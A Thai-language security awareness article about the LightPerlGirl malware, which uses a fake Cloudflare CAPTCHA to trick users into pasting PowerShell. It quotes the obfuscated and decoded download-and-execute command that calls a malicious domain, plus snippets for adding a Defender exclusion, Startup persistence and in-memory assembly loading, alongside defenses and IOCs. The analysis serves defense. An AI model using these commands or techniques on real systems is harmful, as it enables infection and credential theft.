LightPerlGirl: ช่องโหว่ที่อยู่ในตัวคุณ

🚨 เกิดอะไรขึ้น?

นักวิจัยด้านความปลอดภัยค้นพบไวรัสตัวใหม่ชื่อ LightPerlGirl ที่ใช้เทคนิคหลอกลวงที่ชาญฉลาดมาก คือการปลอมเป็น CAPTCHA ของ Cloudflare (ระบบยืนยันตัวตนที่เราเห็นบ่อยๆ บนเว็บ) เพื่อหลอกให้ผู้ใช้รันคำสั่งไวรัสด้วยตัวเอง!

🎭 วิธีการหลอกลวงที่ฉลาดมาก

ขั้นตอนการโจมตี:

1. เว็บไซต์ปลอม: แฮกเกอร์เจาะเข้าไปในเว็บไซต์ WordPress ที่ถูกต้องตามกฎหมาย (ในกรณีนี้คือเว็บท่องเที่ยวหมู่เกาะกาลาปากอส)

2. ป๊อปอัพปลอม: เมื่อคุณเข้าเว็บ จะมีหน้าต่างป๊อปอัพที่ดูเหมือน CAPTCHA ของ Cloudflare ขึ้นมา พร้อมข้อความ "Performance & Security by Cloudflare"

3. การหลอกลวง: ป๊อปอัพจะบอกให้คุณกด:

   • Windows + R (เปิด Run dialog)
   • Ctrl + V (วางคำสั่ง)
   • Enter (รันคำสั่ง)

4. คำสั่งลับ: ในขณะที่คุณทำตามขั้นตอน เว็บไซต์จะคัดลอกคำสั่ง PowerShell ที่เป็นอันตรายลงใน clipboard ของคุณโดยอัตโนมัติ

💻 ตัวอย่างโค้ดที่ถูกซ่อนไว้

คำสั่งที่ถูกปกปิด (ที่คุณเห็น):

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" –nOp –w h –C "$rb"l"d30 = 'cmb"k"z"8kz1″0″0″01″0″8k2″ca"rj"ew"z"f.inf"o'; $v"nr"l"01″ = Invo"k"e"- "RestM"e"th"o"d -Uri $rb"l"d"3″0; I"nvo"k"e-E"xp"ress"i"o"n $v"n"r"l0″1"

คำสั่งจริง (ที่คอมพิวเตอร์เข้าใจ):

$rbld30 = 'cmbkz8kz1000108k2carjewzf.info';
$vnrl01 = Invoke-RestMethod -Uri $rbld30; 
Invoke-Expression $vnrl01

คำสั่งนี้จะ:

• เชื่อมต่อไปยังเซิร์ฟเวอร์อันตราย
• ดาวน์โหลดโค้ดเพิ่มเติม
• รันโค้ดนั้นทันที

🔧 ระบบการทำงานขั้นสูง

Stage 1: การขอสิทธิ์ผู้ดูแลระบบ

function HelpIO {
    $command = "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
    $proc = Start-Process powershell.exe -Verb RunAs -PassThru
    # ขอสิทธิ์ admin เพื่อปิด Windows Defender ในโฟลเดอร์ Temp
}

Stage 2: การสร้างการติดตั้งถาวร

function Urex {
    # ดาวน์โหลดไฟล์ .bat
    Invoke-WebRequest -Uri "https://cmbkz8kz1000108k2carjewzf.info/evr.bat" -OutFile "C:\Windows\Temp\LixPay.bat"
    
    # สร้างลิงก์ใน Startup folder ให้รันทุกครั้งที่เปิดเครื่อง
    $shortcut = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\LixPay.url"
}

Stage 3: การรันไวรัสในหน่วยความจำ

function ExWpL {
    $encodedMalware = "TVqQAAMAAAAEAAAA//8AALgAAAAA..." # ไวรัสที่เข้ารหัสด้วย Base64
    $decodedBytes = [Convert]::FromBase64String($encodedMalware)
    $assembly = [System.Reflection.Assembly]::Load($decodedBytes)
    $assembly.EntryPoint.Invoke($null, @())
    # รันไวรัสโดยตรงในหน่วยความจำ ไม่สร้างไฟล์
}

🎯 เป้าหมายและความอันตราย

ไวรัสตัวนี้ร้ายแรงเพราะ:

1. หลีกเลี่ยงการตรวจจับ: รันในหน่วยความจำ ไม่สร้างไฟล์ที่น่าสงสัย
2. ปิดระบบป้องกัน: สร้าง exclusion ใน Windows Defender
3. ติดตั้งถาวร: รันทุกครั้งที่เปิดเครื่อง
4. ขโมยข้อมูล: ปลายทางคือ Lumma Infostealer ที่ขโมยรหัสผ่าน, คุกกี้, ข้อมูลบัตรเครดิต

กลุ่มเป้าหมาย:

• คนที่มีเงิน (เข้าเว็บท่องเที่ยวราคาแพง)
• ใช้คอมส่วนตัวที่บ้าน (ไม่มีระบบป้องกันระดับองค์กร)
• อาจเป็นผู้บริหารบริษัท = ประตูสู่เครือข่ายองค์กร

🛡️ วิธีป้องกัน

สิ่งที่ควรจำ:

1. CAPTCHA จริงไม่เคยให้วางคำสั่งอะไร ลงใน Command Prompt หรือ PowerShell
2. อย่าเชื่อป๊อปอัพ ที่บอกให้กด Windows + R
3. ตรวจสอบ URL ให้ดี Cloudflare จริงจะไม่ใช้โดเมนแปลกๆ

มาตรการป้องกัน:

• ติดตั้ง EDR (Endpoint Detection and Response) ที่ดี
• เปิด PowerShell Script Block Logging
• ใช้ Application Control เพื่อควบคุมการรัน PowerShell
• อัพเดท Windows Defender ให้ล่าสุด

🔍 สัญญาณเตือนที่ควรระวัง

ไฟล์ที่น่าสงสัย:

• C:\Windows\Temp\LixPay.bat
• %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\LixPay.url

การเชื่อมต่อเครือข่ายที่น่าสงสัย:

• cmbkz8kz1000108k2carjewzf.info
• IP ranges: 146.70.115.0/24, 91.92.46.0/24, 94.74.164.0/24

💡 สรุป

LightPerlGirl แสดงให้เห็นว่าแฮกเกอร์ยุคใหม่ฉลาดแค่ไหน พวกเขาไม่ต้องเจาะระบบของคุณ แค่หลอกให้คุณเปิดประตูให้เอง ด้วยการปลอมเป็นระบบความปลอดภัยที่เราคุ้นเคย

ความอันตรายที่แท้จริงไม่ใช่แค่คอมพิวเตอร์ส่วนตัวที่ติดไวรัส แต่คือการที่แฮกเกอร์สามารถใช้ข้อมูลที่ขโมยได้เพื่อเข้าโจมตีบริษัทที่เหยื่อทำงานอยู่ได้ด้วย

จำไว้: ถ้ามีป๊อปอัพให้วางอะไรลง Command line = ปิดทันที!

---

📚 แหล่งอ้างอิง

1. Todyl Security Research Team - "Threat Advisory: LightPerlGirl Malware" - Official Blog Post (2025)
   URL: https://www.todyl.com/blog/threat-advisory-lightperlgirl-malware

2. SecurityWeek - "Researchers Discover Novel ClickFix Variant Named LightPerlGirl" - June 13, 2025
   URL: https://www.securityweek.com/researchers-discover-novel-clickfix-variant-named-lightperlgirl/

3. David Langlands, CSO Todyl - Interview with SecurityWeek regarding LightPerlGirl discovery
   อ้างอิงจากบทสัมภาษณ์ในบทความ SecurityWeek ข้างต้น

4. Todyl Threat Research, Detection Engineering, and MXDR Teams - Technical analysis by analysts Earnest V and David L
   การวิเคราะห์เทคนิคจากรายงาน Todyl Blog

เพิ่มเติม:

• IOCs และ Hunt Queries: ดูรายละเอียดเพิ่มเติมในรายงานต้นฉบับ Todyl